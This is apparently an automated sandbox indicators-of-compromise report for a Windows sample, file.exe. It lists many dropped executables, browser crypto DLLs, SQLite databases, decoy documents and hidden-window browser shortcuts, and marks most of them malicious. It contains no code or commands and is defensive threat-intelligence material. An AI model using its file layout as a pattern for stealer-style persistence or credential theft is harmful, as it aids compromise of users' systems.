IOC Report
file.exe

loading gif

Files

File Path
Type
Category
Malicious
file.exe
MS-DOS executable PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows, MZ for MS-DOS
initial sample
 malicious
C:\ProgramData\CBAKJEHDBGHI\freebl3.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\ProgramData\CBAKJEHDBGHI\mozglue.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\ProgramData\CBAKJEHDBGHI\nss3.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\ProgramData\CBAKJEHDBGHI\softokn3.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\ProgramData\MPGPH131\MPGPH131.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\ProgramData\MSIUpdaterV202_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV202.exe
PE32 executable (console) Intel 80386, for MS Windows
dropped
 malicious
C:\ProgramData\WinTrackerSP\WinTrackerSP.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\ProgramData\freebl3.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\ProgramData\mozglue.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\ProgramData\nss3.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\ProgramData\softokn3.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\AdobeUpdaterV202_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV202.exe
PE32 executable (console) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\ExtreamFanV5\ExtreamFanV5.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Jenim VOX Free\Qt5OpenGL.dll (copy)
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Jenim VOX Free\Qt5WinExtras.dll (copy)
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Jenim VOX Free\Qt5Xml.dll (copy)
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Jenim VOX Free\QtAVWidgets1.dll (copy)
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Jenim VOX Free\avdevice-58.dll (copy)
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Jenim VOX Free\is-1BNJH.tmp
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Jenim VOX Free\is-34KF0.tmp
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Jenim VOX Free\is-4UKKR.tmp
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Jenim VOX Free\is-86G7M.tmp
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Jenim VOX Free\is-DAF8R.tmp
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Jenim VOX Free\is-FTVKQ.tmp
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Jenim VOX Free\is-G37R2.tmp
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Jenim VOX Free\is-LGKSR.tmp
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Jenim VOX Free\is-OCQV1.tmp
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Jenim VOX Free\is-RAP8S.tmp
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Jenim VOX Free\is-UT4PU.tmp
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Jenim VOX Free\jenimvoxfree.exe
PE32 executable (GUI) Intel 80386, for MS Windows
modified
 malicious
C:\Users\user\AppData\Local\Jenim VOX Free\libcurl.dll (copy)
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Jenim VOX Free\libeay32.dll (copy)
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Jenim VOX Free\libmp3lame.dll (copy)
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Jenim VOX Free\mousehelper.dll (copy)
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Jenim VOX Free\openh264.dll (copy)
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Jenim VOX Free\unins000.exe (copy)
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\7725eaa6592c80f8124e769b4e8a07f7[1].exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\Space1.9_big[1].exe
MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, MZ for MS-DOS
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\cad54ba5b01423b1af8ec10ab5719d97[1].exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\lumma2804[1].exe
PE32 executable (console) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\lumma2804[2].exe
PE32 executable (console) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\loader-1000[1].exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Default16_big[1].exe
MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, MZ for MS-DOS
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\fa003b83[1].exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\freebl3[1].dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\mozglue[1].dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\nss3[1].dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\setup[1].exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\softokn3[1].dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\sqlx[1].dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\060[1].exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\123p[1].exe
PE32+ executable (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Retailer_prog[1].exe
MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, MZ for MS-DOS
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\fiona[1].exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\inte[1].exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\timeSync[1].exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\01MLguFQzwPvOcnwODFKpUb.zip
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
 malicious
C:\Users\user\AppData\Local\Temp\7zS1122.tmp\Install.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\7zS4B1E.tmp\Install.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\GlHuWZv7XujgT5UQlAPqymp.zip
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
 malicious
C:\Users\user\AppData\Local\Temp\PowerExpertNT\PowerExpertNT.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\heidi4UoSaJ1HvcMQ\w53PPy3vv74tECuYyLbA.exe
PE32 executable (console) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\heidibNPjSTVLcfU9\7BTejy19ViiMf8TCyUUs.exe
PE32 executable (console) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\is-DR9JS.tmp\_isetup\_RegDLL.tmp
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\is-DR9JS.tmp\_isetup\_iscrypt.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\is-DR9JS.tmp\_isetup\_setup64.tmp
PE32+ executable (console) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\is-L76CN.tmp\Lxw7uf_bmAos3kuSR2kfSqFW.tmp
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\nsb11FE.tmp\INetC.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\AppData\Local\Temp\wakMCw4Ob6qflGnWt6EgLph.zip
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
 malicious
C:\Users\user\Documents\SimpleAdobe\3F1X4UE0cq9uqeL1QtwwpozI.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\Documents\SimpleAdobe\7c7wJeWsbxc9A0S_EEI7N6oJ.exe
MS-DOS executable PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows, MZ for MS-DOS
dropped
 malicious
C:\Users\user\Documents\SimpleAdobe\7j4wLhTAPWixkZaNy5LyWW9f.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\Documents\SimpleAdobe\7sVkWsg_RoL_wgnhajNaMlOC.exe
PE32+ executable (GUI) x86-64, for MS Windows
dropped
 malicious
C:\Users\user\Documents\SimpleAdobe\8YA903yCU9af_VvvQGvDN1bN.exe
MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, MZ for MS-DOS
dropped
 malicious
C:\Users\user\Documents\SimpleAdobe\8mBlkncAH7snK4fRC6yj2oG4.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\Documents\SimpleAdobe\BjUQmnyU29WChWiYuF77nv8F.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\Documents\SimpleAdobe\BsTMunYiHDsPU7Zl0yLK_TV5.exe
MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, MZ for MS-DOS
dropped
 malicious
C:\Users\user\Documents\SimpleAdobe\DadhSaLOdUdE4LumiIWccpnB.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\Documents\SimpleAdobe\Ei_CrZ0hX5IpZO6M8vmf9YQM.exe
MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, MZ for MS-DOS
dropped
 malicious
C:\Users\user\Documents\SimpleAdobe\IOjjrEgGTt3zhAMwmB54wMWH.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\Documents\SimpleAdobe\IapQulW8JeYr48nijMVQxnzk.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\Documents\SimpleAdobe\KwhvBh9hxs5lQ5lOIYMJQFx5.exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
dropped
 malicious
C:\Users\user\Documents\SimpleAdobe\Lxw7uf_bmAos3kuSR2kfSqFW.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\Documents\SimpleAdobe\N5xV60nTuv_yHhVQbuCWtSAa.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\Documents\SimpleAdobe\NWxEXGU4JfiAdgC6cb7PXiGW.exe
PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
dropped
 malicious
C:\Users\user\Documents\SimpleAdobe\Y7icxeTf_mYHbGUrKS_BgwN8.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
 malicious
C:\Users\user\Documents\SimpleAdobe\jyvJiQ5G7FQWGOiZZtnZarsG.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\Documents\SimpleAdobe\nDqH9YCkRTWfdia7q4yWroCs.exe
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
 malicious
C:\Users\user\Documents\SimpleAdobe\oVDijaSg43uhdsVFv6YSiRRb.exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
dropped
 malicious
C:\Windows\System32\GroupPolicy\gpt.ini
ASCII text, with CRLF line terminators
dropped
 malicious
C:\ProgramData\AFBFHDBK
SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
dropped
C:\ProgramData\AFCAAEGD
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
dropped
C:\ProgramData\AFIIEBGC
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
dropped
C:\ProgramData\AQRFEVRTGL.docx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\ATJBEMHSSB.xlsx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\BGIJDGCAEBFIIECAKFHI
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
dropped
C:\ProgramData\BJZFPPWAPT.xlsx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\BNAGMGSPLO.docx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\CBAKJEHDBGHI\msvcp140.dll
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
C:\ProgramData\CBAKJEHDBGHI\vcruntime140.dll
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
C:\ProgramData\CFIECBFIDGDAKFHIEHJKFHDHDB
SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
dropped
C:\ProgramData\DBGHJEBKJEGHJKECAAKJKEGIIE
SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
dropped
C:\ProgramData\DUUDTUBZFW.xlsx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\EBGCFBGCBFHJECBGDAKKJDGHII
SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
dropped
C:\ProgramData\EEGWXUHVUG.docx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\EEGWXUHVUG.xlsx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\EFGRWFCUWS.xlsx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\EFOYFBOLXA.docx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\EFOYFBOLXA.xlsx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\EGIDAAFI
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
dropped
C:\ProgramData\EOWRVPQCCS.docx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\FCBAECGI
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
dropped
C:\ProgramData\FIDAFIEBFCBKFHIDHIJE
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
dropped
C:\ProgramData\GDHCGDGIEBKJKFHJJKFC
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
dropped
C:\ProgramData\GDHIIDAFIDGCFHJJDGDAEHCAKJ
SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
dropped
C:\ProgramData\GHDBKJKJKKJDGDGDGIDGIIDAAK
SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
dropped
C:\ProgramData\JDAFIEHI
SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
dropped
C:\ProgramData\JDGCGDBGCAAEBFIECGHD
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
dropped
C:\ProgramData\JJECFIECBGDGCAAAEHIEGDGCBG
SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
dropped
C:\ProgramData\JKEGDHCFCAAECAKECBAFHIIJKJ
SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
dropped
C:\ProgramData\KKJEBAAECBGDHIECAKJKKECFHJ
SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
dropped
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Wed Oct 4 13:16:40 2023, atime=Wed Sep 27 04:28:27 2023, length=3242272, window=hide
dropped
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Thu Aug 5 21:41:46 2021, mtime=Tue Oct 3 11:10:59 2023, atime=Fri Sep 29 11:17:35 2023, length=4210216, window=hide
modified
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_7j4wLhTAPWixkZaN_e57b0455b9c3f4141f38fe8effeb4a0fbe3f5d9_cb7c0ebb_70c8d71e-52cf-4ad6-b07e-5e0d1d5be623\Report.wer
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_7j4wLhTAPWixkZaN_e57b0455b9c3f4141f38fe8effeb4a0fbe3f5d9_cb7c0ebb_ac9822d0-df3c-46dc-9c33-29d20e783e94\Report.wer
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2237.tmp.csv
data
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2630.tmp.txt
data
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER34C7.tmp.dmp
Mini DuMP crash report, 14 streams, Tue Apr 30 18:31:12 2024, 0x1205a4 type
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER35F1.tmp.WERInternalMetadata.xml
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3660.tmp.xml
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER368D.tmp.csv
data
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3796.tmp.csv
data
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER4812.tmp.txt
data
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER4979.tmp.txt
data
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER584D.tmp.dmp
Mini DuMP crash report, 14 streams, Tue Apr 30 18:31:22 2024, 0x1205a4 type
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER5906.tmp.csv
data
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER5ABF.tmp.WERInternalMetadata.xml
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER5B3D.tmp.xml
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER5B87.tmp.txt
data
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER5C28.tmp.csv
data
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER5E4B.tmp.txt
data
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER6EB8.tmp.csv
data
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER70BC.tmp.txt
data
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER80BB.tmp.csv
data
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER84A4.tmp.txt
data
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERA627.tmp.csv
data
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERB1FF.tmp.csv
data
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERB2CB.tmp.txt
data
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERB889.tmp.txt
data
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC5E8.tmp.csv
data
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC83B.tmp.csv
data
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERD56B.tmp.txt
data
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERD8C7.tmp.txt
data
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERED2B.tmp.csv
data
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WERFC5F.tmp.txt
data
dropped
C:\ProgramData\NIRMEKAMZH.docx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\NVWZAPQSQL.docx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\SQSJKEBWDT.xlsx
ASCII text, with very long lines (1024), with CRLF line terminators
dropped
C:\ProgramData\msvcp140.dll
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
C:\ProgramData\vcruntime140.dll
PE32 executable (DLL) (console) Intel 80386, for MS Windows
dropped
C:\Users\Public\Desktop\Google Chrome.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Wed Oct 4 13:16:53 2023, atime=Wed Sep 27 04:28:27 2023, length=3242272, window=hide
dropped
C:\Users\user\AppData\Local\Jenim VOX Free\Qt5Svg.dll (copy)
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Jenim VOX Free\is-02FRQ.tmp
data
dropped
C:\Users\user\AppData\Local\Jenim VOX Free\is-1D966.tmp
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Jenim VOX Free\is-3RFCM.tmp
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Jenim VOX Free\is-CGMPA.tmp
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Jenim VOX Free\is-H0P4Q.tmp
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Jenim VOX Free\is-HL2GM.tmp
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Jenim VOX Free\is-NPAG3.tmp
ASCII text
dropped
C:\Users\user\AppData\Local\Jenim VOX Free\is-P1PUA.tmp
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Jenim VOX Free\msvcp120.dll (copy)
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Jenim VOX Free\msvcp140.dll (copy)
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Jenim VOX Free\msvcp140_1.dll (copy)
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Jenim VOX Free\msvcr120.dll (copy)
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Jenim VOX Free\openh264_license.txt (copy)
ASCII text
dropped
C:\Users\user\AppData\Local\Jenim VOX Free\proportions.txt (copy)
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Jenim VOX Free\unins000.dat
InnoSetup Log Jenim VOX Free, version 0x30, 5175 bytes, 618321\user, "C:\Users\user\AppData\Local\Jenim VOX Free"
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MsBuild.exe.log
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Y7icxeTf_mYHbGUrKS_BgwN8.exe.log
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Advocacy
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Breeding
OpenPGP Public Key
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Cyprus
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Folk
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Fuji
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\crypted[1].bmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\setup[1].htm
HTML document, ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\76561199680449169[1].htm
HTML document, Unicode text, UTF-8 text, with very long lines (3041), with CRLF, LF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\BotClient_make[1].bmp
data
dropped
